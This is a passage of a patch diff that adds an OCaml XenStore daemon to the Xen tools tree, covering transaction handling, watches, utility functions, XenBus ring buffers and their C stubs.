+let equal t1 t2 =
+  t1.domain_id = t2.domain_id && t1.transaction_id = t2.transaction_id
+
+let fire_watch watches changed_node =
+  match changed_node.operation with
+  | RM -> watches#fire_watches changed_node.path false true
+  | WRITE -> watches#fire_watches changed_node.path false false
+  | _ -> ()
+
+let fire_watches watches changed_nodes =
+  List.iter (fire_watch watches) changed_nodes
+
+let make domain_id transaction_id =
+  {
+    domain_id = domain_id;
+    transaction_id = transaction_id
+  }
+
+let make_element transaction operation path =
+  {
+    transaction = transaction;
+    operation = operation;
+    path = path;
+    modified = false
+  }
+
+module Transaction_hashtbl =
+  Hashtbl.Make
+  (struct
+    type t = tr
+    let equal = equal
+    let hash = Hashtbl.hash
+  end)
+
+class transaction_reads =
+object (self)
+  val m_paths = Hashtbl.create 32
+  val m_transactions = Transaction_hashtbl.create 8
+  method private paths = m_paths
+  method private transactions = m_transactions
+  method add transaction path =
+    let operation = make_element transaction READ path
+    and paths = self#paths
+    and transactions = self#transactions in
+    let path_operations =
+      if Hashtbl.mem paths path
+      then
+        let current_operations = Hashtbl.find paths path in
+        if not (List.exists (fun op -> transaction = op.transaction) 
current_operations)
+        then operation :: current_operations
+        else current_operations
+      else [ operation ]
+    and transaction_operations =
+      if Transaction_hashtbl.mem transactions transaction
+      then
+        let current_operations = Transaction_hashtbl.find transactions 
transaction in
+        if not (List.exists (fun op -> path = op.path) current_operations)
+        then operation :: current_operations
+        else current_operations
+      else [ operation ] in
+    Hashtbl.replace paths path path_operations;
+    Transaction_hashtbl.replace transactions transaction transaction_operations
+  method path_operations path = Hashtbl.find self#paths path
+  method remove_path_operation operation =
+    let remaining = List.filter (fun op -> not (equal op.transaction 
operation.transaction)) (self#path_operations operation.path) in
+    if List.length remaining > 0
+    then Hashtbl.replace self#paths operation.path remaining
+    else Hashtbl.remove self#paths operation.path
+  method remove_transaction_operations transaction =
+    (try List.iter self#remove_path_operation (self#transaction_operations 
transaction) with Not_found -> ());
+    Transaction_hashtbl.remove self#transactions transaction
+  method transaction_operations transaction = Transaction_hashtbl.find 
self#transactions transaction
+end
+
+class ['contents] transaction_store (transaction : tr) (store : 'contents 
Store.store) (reads : transaction_reads) =
+object (self)
+  inherit ['contents]Store.store as super
+  val m_reads = reads
+  val m_store = store
+  val m_transaction = transaction
+  val m_updates = Hashtbl.create 8
+  method private domain_id = self#transaction.domain_id
+  method private merge_node node =
+    if self#op_exists node#path WRITE || self#op_exists node#path RM || 
self#op_exists node#path NONE
+    then self#store#replace_node node
+    else
+      match node#contents with
+      | Store.Children children | Store.Hack (_, children) -> List.iter (fun 
child -> self#merge_node child) children
+      | _ -> ()
+  method private op_add path op =
+    match op with
+    | WRITE -> if not (self#op_exists path RM) then Hashtbl.replace 
self#updates path (make_element self#transaction op path)
+    | RM -> Hashtbl.replace self#updates path (make_element self#transaction 
op path)
+    | READ -> if not (self#op_exists path READ) then self#reads#add 
self#transaction path
+    | NONE -> Hashtbl.replace self#updates path (make_element self#transaction 
op path)
+  method private op_exists path op =
+    match op with
+    | WRITE | RM | NONE -> (try (Hashtbl.find self#updates path).operation = 
op with Not_found -> false)
+    | READ -> (try List.exists (fun op -> op.transaction = self#transaction) 
(self#reads#path_operations path) with Not_found -> false)
+  method private reads = m_reads
+  method private store = m_store
+  method private transaction = m_transaction
+  method private updates = m_updates
+  method changed_nodes = Hashtbl.fold (fun path element nodes -> element :: 
nodes) self#updates []
+  method create_node path =
+    if not (self#op_exists path WRITE) then self#op_add path WRITE;
+    super#create_node path
+  method merge = self#merge_node self#root
+  method node_exists path =
+    if self#op_exists path WRITE || self#op_exists path RM || self#op_exists 
path NONE then super#node_exists path else self#store#node_exists path
+  method read_node path =
+    if self#op_exists path WRITE || self#op_exists path RM || self#op_exists 
path NONE
+    then super#read_node path
+    else (
+      self#op_add path READ;
+      self#store#read_node path
+    )
+  method remove_node path =
+    let parent_path = Store.parent_path path in
+    if self#op_exists parent_path WRITE || self#op_exists parent_path RM || 
self#op_exists parent_path NONE
+    then (
+      super#remove_node path;
+      self#op_add path RM
+    )
+    else (
+      if not (super#node_exists parent_path)
+      then (
+        super#create_node parent_path;
+        let contents =
+          (match (self#store#read_node parent_path) with
+            | Store.Children _ -> Store.Children []
+            | Store.Hack (value, _) -> Store.Hack (value, [])
+            | contents -> contents) in
+        (super#get_node parent_path)#set_contents contents
+      );
+      let self_parent_node = self#get_node parent_path in
+      match self_parent_node#contents with
+      | Store.Children self_parent_children | Store.Hack (_, 
self_parent_children) -> (
+            (match self#store#read_node parent_path with
+              | Store.Children store_parent_children | Store.Hack (_, 
store_parent_children) -> List.iter (fun store_parent_child -> if not 
(List.exists (fun self_parent_child -> Store.compare self_parent_child 
store_parent_child = 0) self_parent_children) then ignore 
(self_parent_node#add_child store_parent_child)) store_parent_children
+              | Store.Empty -> ()
+              | Store.Value _ -> raise (Constants.Xs_error (Constants.EINVAL, 
"Transaction.transaction_store#remove_node", path)));
+            self_parent_node#remove_child path;
+            self#op_add path RM;
+            self#op_add parent_path NONE
+          )
+      | _ -> raise (Constants.Xs_error (Constants.EINVAL, 
"Transaction.transaction_store#remove_node", path))
+    )
+  method write_node path (contents : 'contents) =
+    if self#op_exists path WRITE || self#op_exists path RM || self#op_exists 
path NONE
+    then (
+      if not (super#node_exists path) then super#create_node path;
+      self#op_add path WRITE;
+      super#write_node path contents
+    )
+    else if self#store#node_exists path
+    then (
+      self#create_node path;
+      super#write_node path contents
+    )
+    else raise (Constants.Xs_error (Constants.EINVAL, 
"Transaction.transaction_store#write_node", path))
+end
+
+class ['contents] transactions (store : 'contents Store.store) =
+object (self)
+  val m_base_store = store
+  val m_num_transactions = Hashtbl.create 8
+  val m_reads = new transaction_reads
+  val m_transaction_changed_domains = Transaction_hashtbl.create 8
+  val m_transaction_ids = Hashtbl.create 8
+  val m_transactions = Transaction_hashtbl.create 8
+  method private add transaction store =
+    if not (Transaction_hashtbl.mem self#transactions transaction)
+    then (
+      Transaction_hashtbl.add self#transactions transaction (new 
transaction_store transaction store self#reads);
+      Transaction_hashtbl.add self#transaction_changed_domains transaction [ { 
id = transaction.domain_id; entries = 0 } ];
+      Hashtbl.replace self#num_transactions transaction.domain_id (try succ 
(self#num_transactions_for_domain transaction.domain_id) with Not_found -> 1);
+    )
+  method private num_transactions = m_num_transactions
+  method private reads = m_reads
+  method private remove transaction =
+    self#reads#remove_transaction_operations transaction;
+    Transaction_hashtbl.remove self#transactions transaction;
+    Transaction_hashtbl.remove self#transaction_changed_domains transaction;
+    Hashtbl.replace self#num_transactions transaction.domain_id (pred 
(self#num_transactions_for_domain transaction.domain_id))
+  method private transaction_changed_domains = m_transaction_changed_domains
+  method private transaction_ids = m_transaction_ids
+  method private transaction_store transaction = Transaction_hashtbl.find 
self#transactions transaction
+  method private transactions = m_transactions
+  method private validate transaction =
+    try not (List.fold_left (fun modified op -> if equal op.transaction 
transaction then op.modified || modified else modified) false 
(self#reads#transaction_operations transaction))
+    with _ -> true
+  method base_store = m_base_store
+  method commit transaction =
+    if self#validate transaction
+    then (
+      let tstore = self#transaction_store transaction in
+      let changed_nodes = tstore#changed_nodes in
+      self#invalidate_nodes changed_nodes;
+      tstore#merge;
+      self#remove transaction;
+      changed_nodes
+    )
+    else (
+      self#remove transaction;
+      raise Not_found
+    )
+  method domain_entries transaction = Transaction_hashtbl.find 
self#transaction_changed_domains transaction
+  method domain_entry_decr (transaction : tr) domain_id =
+    try
+      let domain_entry = List.find (fun entry -> entry.id = domain_id) 
(self#domain_entries transaction) in
+      let new_domain_entry = { id = domain_id; entries = pred 
domain_entry.entries } in
+      Transaction_hashtbl.replace self#transaction_changed_domains transaction 
(new_domain_entry :: (List.filter (fun entry -> entry.id <> domain_id) 
(self#domain_entries transaction)))
+    with Not_found ->
+        let new_domain_entry = { id = domain_id; entries = (- 1) } in
+        Transaction_hashtbl.replace self#transaction_changed_domains 
transaction (new_domain_entry :: (self#domain_entries transaction))
+  method domain_entry_incr (transaction : tr) domain_id =
+    try
+      let domain_entry = List.find (fun entry -> entry.id = domain_id) 
(self#domain_entries transaction) in
+      let new_domain_entry = { id = domain_id; entries = succ 
domain_entry.entries } in
+      Transaction_hashtbl.replace self#transaction_changed_domains transaction 
(new_domain_entry :: (List.filter (fun entry -> entry.id <> domain_id) 
(self#domain_entries transaction)))
+    with Not_found ->
+        let new_domain_entry = { id = domain_id; entries = 1 } in
+        Transaction_hashtbl.replace self#transaction_changed_domains 
transaction (new_domain_entry :: (self#domain_entries transaction))
+  method exists transaction = Transaction_hashtbl.mem self#transactions 
transaction
+  method invalidate path = try List.iter (fun op -> op.modified <- true) 
(self#reads#path_operations path) with Not_found -> ()
+  method invalidate_nodes nodes = List.iter (fun node -> self#invalidate 
node.path) nodes
+  method new_transaction (domain : Domain.domain) store =
+    if not (Hashtbl.mem self#transaction_ids domain#id) then Hashtbl.add 
self#transaction_ids domain#id 1l;
+    let transaction_id = Hashtbl.find self#transaction_ids domain#id in
+    let transaction = make domain#id transaction_id in
+    Hashtbl.replace self#transaction_ids domain#id (Int32.succ transaction_id);
+    if not (Transaction_hashtbl.mem self#transactions transaction) && 
transaction.transaction_id <> 0l
+    then (self#add transaction store; transaction)
+    else self#new_transaction domain store
+  method num_transactions_for_domain domain_id = try Hashtbl.find 
self#num_transactions domain_id with Not_found -> 0
+  method remove_domain (domain : Domain.domain) =
+    Transaction_hashtbl.iter (fun transaction store -> if 
transaction.domain_id = domain#id then self#remove transaction) 
self#transactions;
+    Hashtbl.remove self#num_transactions domain#id;
+    Hashtbl.remove self#transaction_ids domain#id
+  method store transaction = try ((self#transaction_store transaction) :> 
'contents Store.store) with Not_found -> self#base_store
+end
diff -r 10a8fae412c5 tools/xenstore/utils.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/utils.ml   Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,122 @@
+(* 
+    Utils for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+(* Print an error to standard output stream and die *)
+let barf str =
+  Printf.printf "FATAL: %s\n" str; flush stdout;
+  ignore (exit 1)
+
+(* Print an error to the error stream and die *)
+let barf_perror str =
+  Printf.eprintf "FATAL: %s\n" str; flush stderr;
+  ignore (exit 1)
+
+(* Convert a string of bytes into an int32 *)
+let bytes_to_int32 bytes =
+  let num_bytes = 4 in
+  (* Convert bytes to an int32 *)
+  let rec loop i n =
+    if i >= num_bytes
+    then n
+    else loop (succ i) (Int32.add (Int32.shift_left n 8) (Int32.of_int 
(int_of_char bytes.[(num_bytes - 1) - i])))
+  in
+  loop 0 Int32.zero
+
+(* Convert a string of bytes into an int *)
+let bytes_to_int bytes =
+  Int32.to_int (bytes_to_int32 bytes)
+
+let combine lst =
+  List.fold_left (fun rest i -> rest ^ i) Constants.null_string lst
+
+let combine_with_string lst str =
+  List.fold_left (fun rest i -> rest ^ i ^ str) Constants.null_string lst
+
+(* Convert an int into a string of bytes *)
+let int32_to_bytes num =
+  let num_bytes = 4 in
+  let bytes = String.create num_bytes in
+  let rec loop i n =
+    if i < num_bytes
+    then (
+      bytes.[i] <- char_of_int (Int32.to_int (Int32.logand 0xFFl n));
+      loop (succ i) (Int32.shift_right_logical n 8)
+    )
+  in
+  loop 0 num;
+  bytes
+
+(* Convert an int into a string of bytes *)
+let int_to_bytes num =
+  int32_to_bytes (Int32.of_int num)
+
+(* Null terminate a string *)
+let null_terminate str =
+  str ^ (String.make 1 Constants.null_char)
+
+(* Remove the last element from a list *)
+let remove_last list =
+  let length = pred (List.length list) in
+  let rec loop n = (if (n = length) then [] else (List.nth list n :: loop 
(succ n))) in
+  loop 0
+
+(* Clean a string up for output *)
+let sanitise_string str =
+  let replacement_string = String.make 1 ' ' in
+  let rec replace_nulls s =
+    try
+      let i = String.index s Constants.null_char in
+      (String.sub s 0 i) ^ replacement_string ^ (replace_nulls (String.sub s 
(succ i) ((String.length s) - (succ i))))
+    with Not_found -> s
+  in
+  replace_nulls str
+
+(* Split a string into a list of strings based on the specified character *)
+let split_on_char str char =
+  let rec split_loop s =
+    if (s = Constants.null_string) then []
+    else
+      try
+        let null_index = String.index s char in
+        String.sub s 0 null_index :: split_loop (String.sub s (succ 
null_index) ((String.length s) - (succ null_index)))
+      with Not_found -> [ s ] | Invalid_argument _ -> []
+  in
+  split_loop str
+
+(* Split a string into a list of strings based on the null character *)
+let split str =
+  split_on_char str Constants.null_char
+
+(* Strip the trailing null byte off a string, if there is one *)
+let strip_null str =
+  if String.length str = 0 then str
+  else
+    let last = pred (String.length str) in
+    if str.[last] = Constants.null_char then String.sub str 0 last else str
+
+(* Return if a string contains another string *)
+let rec strstr s1 s2 =
+  try
+    let i = String.index s1 s2.[0] in
+    if String.length (String.sub s1 i ((String.length s1) - i)) < 
String.length s2
+    then false
+    else if String.sub s1 i (String.length s2) = s2
+    then true
+    else strstr (String.sub s1 (succ i) ((String.length s1) - (succ i))) s2
+  with Not_found -> false
diff -r 10a8fae412c5 tools/xenstore/watch.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/watch.ml   Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,106 @@
+(* 
+    Watches for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+type t =
+  {
+    domain : Domain.domain;
+    path : string;
+    token : string;
+    relative : bool
+  }
+
+let make domain path token relative =
+  {
+    domain = domain;
+    path = path;
+    token = token;
+    relative = relative
+  }
+
+let equal watch1 watch2 =
+  watch1.domain#id = watch2.domain#id && watch1.token = watch2.token && 
watch1.path = watch2.path
+
+(* Fire a watch *)
+let fire_watch path recurse watch =
+  let relative_base_path = Store.domain_root ^ (string_of_int watch.domain#id) 
in
+  let relative_base_length = succ (String.length relative_base_path) in
+  if Store.is_child path watch.path
+  then
+    let watch_path =
+      if watch.relative
+      then String.sub path relative_base_length ((String.length path) - 
relative_base_length)
+      else path in
+    watch.domain#add_output_message (Message.event ((Utils.null_terminate 
watch_path) ^ (Utils.null_terminate watch.token)))
+  else if recurse && Store.is_child watch.path path
+  then
+    let watch_path =
+      if watch.relative
+      then String.sub watch.path relative_base_length ((String.length 
watch.path) - relative_base_length)
+      else watch.path in
+    watch.domain#add_output_message (Message.event ((Utils.null_terminate 
watch_path) ^ (Utils.null_terminate watch.token)))
+
+class watches =
+object(self)
+  val m_domain_watches = Hashtbl.create 16
+  val m_watches = Hashtbl.create 32
+  method private add_domain_watch watch =
+    let watches = try Hashtbl.find self#domain_watches watch.domain#id with 
Not_found -> [] in
+    Hashtbl.replace self#domain_watches watch.domain#id (watch :: watches)
+  method private domain_watches = m_domain_watches
+  method private remove_domain_watch watch =
+    let watches = try Hashtbl.find self#domain_watches watch.domain#id with 
Not_found -> [] in
+    Hashtbl.replace self#domain_watches watch.domain#id (List.filter (fun w -> 
not (equal watch w)) watches)
+  method private watches = m_watches
+  method add (watch : t) =
+    if Hashtbl.mem self#watches watch.path
+    then (
+      let path_watches = Hashtbl.find self#watches watch.path in
+      try ignore (List.find (equal watch) path_watches); false
+      with Not_found -> (
+            Hashtbl.replace self#watches watch.path (watch :: path_watches);
+            self#add_domain_watch watch;
+            true
+          )
+    )
+    else (
+      Hashtbl.add self#watches watch.path [ watch ];
+      self#add_domain_watch watch;
+      true
+    )
+  method fire_watches path in_transaction recursive =
+    if not in_transaction then Hashtbl.iter (fun _ watches -> List.iter 
(fire_watch path recursive) watches) self#watches
+  method num_watches_for_domain domain_id = try List.length (Hashtbl.find 
self#domain_watches domain_id) with Not_found -> 0
+  method remove (watch : t) =
+    if Hashtbl.mem self#watches watch.path
+    then (
+      let remaining_watches = List.filter (fun w -> not (equal watch w)) 
(Hashtbl.find self#watches watch.path) in
+      if List.length remaining_watches > 0
+      then Hashtbl.replace self#watches watch.path remaining_watches
+      else Hashtbl.remove self#watches watch.path;
+      self#remove_domain_watch watch;
+      true
+    )
+    else false
+  method remove_watches (domain : Domain.domain) =
+    if Hashtbl.mem self#domain_watches domain#id
+    then (
+      List.iter (fun watch -> if self#remove watch then Trace.destroy 
watch.domain#id "watch") (Hashtbl.find self#domain_watches domain#id);
+      Hashtbl.remove self#domain_watches domain#id;
+    )
+end
diff -r 10a8fae412c5 tools/xenstore/xenbus.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/xenbus.ml  Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,102 @@
+(* 
+    XenBus for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+let ring_size = 1024
+
+type xenbus_t
+type ring_t
+type ring_index_t
+
+external init_req_cons : xenbus_t -> ring_index_t = "init_req_cons_c"
+external init_req_prod : xenbus_t -> ring_index_t = "init_req_prod_c"
+external init_req_ring : xenbus_t -> ring_t = "init_req_ring_c"
+external init_rsp_cons : xenbus_t -> ring_index_t = "init_rsp_cons_c"
+external init_rsp_prod : xenbus_t -> ring_index_t = "init_rsp_prod_c"
+external init_rsp_ring : xenbus_t -> ring_t = "init_rsp_ring_c"
+external read_ring : ring_t -> int -> string -> int -> int -> unit = 
"read_ring_c"
+external write_ring : ring_t -> int -> string -> int -> int -> unit = 
"write_ring_c"
+external get_index : ring_index_t -> int32 = "get_index_c"
+external set_index : ring_index_t -> int32 -> unit = "set_index_c"
+external mmap : int -> xenbus_t = "mmap_c"
+external map_foreign : int -> int -> int -> xenbus_t = "xc_map_foreign_range_c"
+external munmap : xenbus_t -> unit = "munmap_c"
+external mb : unit -> unit = "mb_c"
+
+(* Ring buffer *)
+class ring_buffer ring consumer producer =
+object (self)
+  val m_consumer = consumer
+  val m_producer = producer
+  val m_ring = ring
+  method private advance_consumer amount = set_index m_consumer (Int32.add 
self#consumer (Int32.of_int amount))
+  method private advance_producer amount = set_index m_producer (Int32.add 
self#producer (Int32.of_int amount))
+  method private check_indexes = self#diff <= ring_size
+  method private consumer = get_index m_consumer
+  method private diff = Int32.to_int (Int32.sub self#producer self#consumer)
+  method private mask_index index = (Int32.to_int index) land (pred ring_size)
+  method private producer = get_index m_producer
+  method private ring = m_ring
+  method private set_producer index = set_index m_producer index
+  method can_read = self#diff <> 0
+  method can_write = self#diff <> ring_size
+  method read buffer offset length =
+    let start = self#mask_index self#consumer
+    and diff = self#diff in
+    if not self#check_indexes then raise (Constants.Xs_error (Constants.EIO, 
"ring_buffer#read_ring", "could not check indexes"));
+    mb ();
+    let read_length = min (min diff length) (ring_size - start) in
+    read_ring self#ring start buffer offset read_length;
+    mb ();
+    self#advance_consumer read_length;
+    read_length
+  method write buffer offset length =
+    let start = self#mask_index self#producer
+    and diff = self#diff in
+    if not self#check_indexes then raise (Constants.Xs_error (Constants.EIO, 
"ring_buffer#write_ring", "could not check indexes"));
+    mb ();
+    let write_length = min (min (ring_size - diff) length) (ring_size - start) 
in
+    write_ring self#ring start buffer offset write_length;
+    mb ();
+    self#advance_producer write_length;
+    write_length
+end
+
+(* XenBus interface *)
+class xenbus_interface port xenbus =
+object (self)
+  inherit Interface.interface as super
+  val m_port = port
+  val m_request_ring = new ring_buffer (init_req_ring xenbus) (init_req_cons 
xenbus) (init_req_prod xenbus)
+  val m_response_ring = new ring_buffer (init_rsp_ring xenbus) (init_rsp_cons 
xenbus) (init_rsp_prod xenbus)
+  val m_xenbus = xenbus
+  method private port = m_port
+  method private request_ring = m_request_ring
+  method private response_ring = m_response_ring
+  method can_read = self#request_ring#can_read
+  method can_write = self#response_ring#can_write
+  method destroy = if Eventchan.unbind self#port then munmap m_xenbus
+  method read buffer offset length =
+    let bytes_read = self#request_ring#read buffer offset (min length 
(String.length buffer)) in
+    Eventchan.notify self#port;
+    bytes_read
+  method write buffer offset length =
+    let bytes_written = self#response_ring#write buffer offset (min length 
(String.length buffer)) in
+    Eventchan.notify self#port;
+    bytes_written
+end
diff -r 10a8fae412c5 tools/xenstore/xenbus_c.c
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/xenbus_c.c Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,204 @@
+/*
+    XenBus C stubs for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*/
+
+#include <stdint.h>
+#include <stdio.h>
+#include <errno.h>
+#include <unistd.h>
+#include <sys/mman.h>
+
+#include <xenctrl.h>
+#include <xen/io/xs_wire.h>
+
+#include <caml/mlvalues.h>
+#include <caml/callback.h>
+#include <caml/memory.h>
+#include <caml/alloc.h>
+
+/* Memory barrier */
+value mb_c (value dummy)
+{
+       CAMLparam1 (dummy);
+
+    asm volatile ( "lock; addl $0,0(%%esp)" : : : "memory" );
+
+       CAMLreturn (Val_unit);
+}
+
+/* Map a file */
+value mmap_c (value fd_v)
+{
+       CAMLparam1 (fd_v);
+
+       int fd = Int_val (fd_v);
+       long pagesize = getpagesize();
+       value rv = alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) mmap(NULL, pagesize, PROT_READ|PROT_WRITE, 
MAP_SHARED, fd, 0);
+
+       CAMLreturn (rv);
+}
+
+/* Unmap a file */
+value munmap_c (value xenbus_v)
+{
+       CAMLparam1 (xenbus_v);
+
+       struct xenstore_domain_interface *intf = (struct 
xenstore_domain_interface *)Field (xenbus_v, 0);
+       long pagesize = getpagesize();
+
+       CAMLreturn (Val_int (munmap(intf, pagesize)));
+}
+
+/* Map a foreign page */
+value xc_map_foreign_range_c (value xc_handle_v, value domid_v, value mfn_v)
+{
+       CAMLparam3 (xc_handle_v, domid_v, mfn_v);
+
+       int xc_handle = Int_val (xc_handle_v);
+       long pagesize = getpagesize();
+       uint32_t domid = (uint32_t)(Int_val (domid_v));
+       unsigned long mfn = (unsigned long)(Int_val (mfn_v));
+       value rv = alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) xc_map_foreign_range(xc_handle, domid, 
pagesize, PROT_READ|PROT_WRITE, mfn);
+
+       CAMLreturn (rv);
+}
+
+value get_index_c (value index_v)
+{
+       CAMLparam1 (index_v);
+
+       uint32_t i = *(uint32_t *)(Field (index_v, 0));
+
+       CAMLreturn (caml_copy_int32(i));
+}
+
+value set_index_c (value index_v, value val_v)
+{
+       CAMLparam2 (index_v, val_v);
+
+       uint32_t i = Int32_val (val_v);
+       *(uint32_t *)(Field (index_v, 0)) = i;
+
+       CAMLreturn (Val_unit);
+}
+
+value init_req_ring_c (value xenbus_v)
+{
+       CAMLparam1 (xenbus_v);
+
+       struct xenstore_domain_interface *intf = (struct 
xenstore_domain_interface *)Field (xenbus_v, 0);
+       value rv = alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) &(intf->req);
+
+       CAMLreturn (rv);
+}
+
+value init_rsp_ring_c (value xenbus_v)
+{
+       CAMLparam1 (xenbus_v);
+
+       struct xenstore_domain_interface *intf = (struct 
xenstore_domain_interface *)Field (xenbus_v, 0);
+       value rv = alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) &(intf->rsp);
+
+       CAMLreturn (rv);
+}
+
+value init_req_cons_c (value xenbus_v)
+{
+       CAMLparam1 (xenbus_v);
+
+       struct xenstore_domain_interface *intf = (struct 
xenstore_domain_interface *)Field (xenbus_v, 0);
+       value rv = alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) &(intf->req_cons);
+
+       CAMLreturn (rv);
+}
+
+value init_req_prod_c (value xenbus_v)
+{
+       CAMLparam1 (xenbus_v);
+
+       struct xenstore_domain_interface *intf = (struct 
xenstore_domain_interface *)Field (xenbus_v, 0);
+       value rv = alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) &(intf->req_prod);
+
+       CAMLreturn (rv);
+}
+
+value init_rsp_cons_c (value xenbus_v)
+{
+       CAMLparam1 (xenbus_v);
+
+       struct xenstore_domain_interface *intf = (struct 
xenstore_domain_interface *)Field (xenbus_v, 0);
+       value rv =  alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) &(intf->rsp_cons);
+
+       CAMLreturn (rv);
+}
+
+value init_rsp_prod_c (value xenbus_v)
+{
+       CAMLparam1 (xenbus_v);
+
+       struct xenstore_domain_interface *intf = (struct 
xenstore_domain_interface *)Field (xenbus_v, 0);
+       value rv = alloc (Abstract_tag, 1);
+       Field (rv, 0) = (value) &(intf->rsp_prod);
+
+       CAMLreturn (rv);
+}
+
+/* Read from a ring buffer */
+value read_ring_c (value ring_v, value ring_ofs_v, value buff_v, value 
buff_ofs_v, value len_v)
+{
+       CAMLparam5 (ring_v, ring_ofs_v, buff_v, buff_ofs_v, len_v);
+
+       char *ring = (char *)(Field (ring_v, 0));
+       char *buff = String_val (buff_v);
+       int ring_ofs = Int_val (ring_ofs_v);
+       int buff_ofs = Int_val (buff_ofs_v);
+       int len = Int_val (len_v);
+       int i;
+
+       for (i = 0; i < len; i++) {
+               buff[buff_ofs + i] = ring[ring_ofs + i];
+       }
+
+       CAMLreturn (Val_unit);
+}
+
+/* Write to a ring buffer */
+value write_ring_c (value ring_v, value ring_ofs_v, value buff_v, value 
buff_ofs_v, value len_v)
+{
+       CAMLparam5 (ring_v, ring_ofs_v, buff_v, buff_ofs_v, len_v);
+
+       char *ring = (char *)(Field (ring_v, 0));
+       char *buff = String_val (buff_v);
+       int ring_ofs = Int_val (ring_ofs_v);
+       int buff_ofs = Int_val (buff_ofs_v);
+       int len = Int_val (len_v);
+       int i;
+
+       for (i = 0; i < len; i++) {
+               ring[ring_ofs + i] = buff[buff_ofs + i];
+       }
+
+       CAMLreturn (Val_unit);
+}
diff -r 10a8fae412c5 tools/xenstore/xenstored.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/xenstored.ml       Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,135 @@
+(* 
+    OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+let domxs_init id =
+  let port = Eventchan.bind_interdomain id (Os.get_xenbus_port ()) in
+  let interface = Os.map_xenbus port in
+  let connection = new Connection.connection interface in
+  Eventchan.notify port;
+  new Domain.domain id connection
+
+let domain_entry_change domains domain_entry =
+  if (domain_entry.Transaction.entries > 0)
+  then
+    for i = 1 to domain_entry.Transaction.entries do
+      domains#entry_incr domain_entry.Transaction.id
+    done
+  else if (domain_entry.Transaction.entries < 0)
+  then
+    for i = domain_entry.Transaction.entries to (- 1) do
+      domains#entry_decr domain_entry.Transaction.id
+    done
+
+class xenstored options store =
+object(self)
+  val m_domains = new Domain.domains
+  val m_options : Option.t = options
+  val m_permissions = new Permission.permissions
+  val m_transactions = new Transaction.transactions store
+  val m_store = store
+  val m_watches = new Watch.watches
+  val mutable m_virq_port = Constants.null_file_descr
+  initializer m_permissions#set [ (Permission.string_of_permission 
(Permission.make Permission.NONE 0)) ] store Store.root_path; 
self#initialise_store
+  method private store = m_store
+  method add_domain domain =
+    self#domains#add domain;
+    Trace.create domain#id "connection"
+  method add_watch (domain : Domain.domain) watch =
+    if not (Domain.is_unprivileged domain) || 
self#watches#num_watches_for_domain domain#id < 
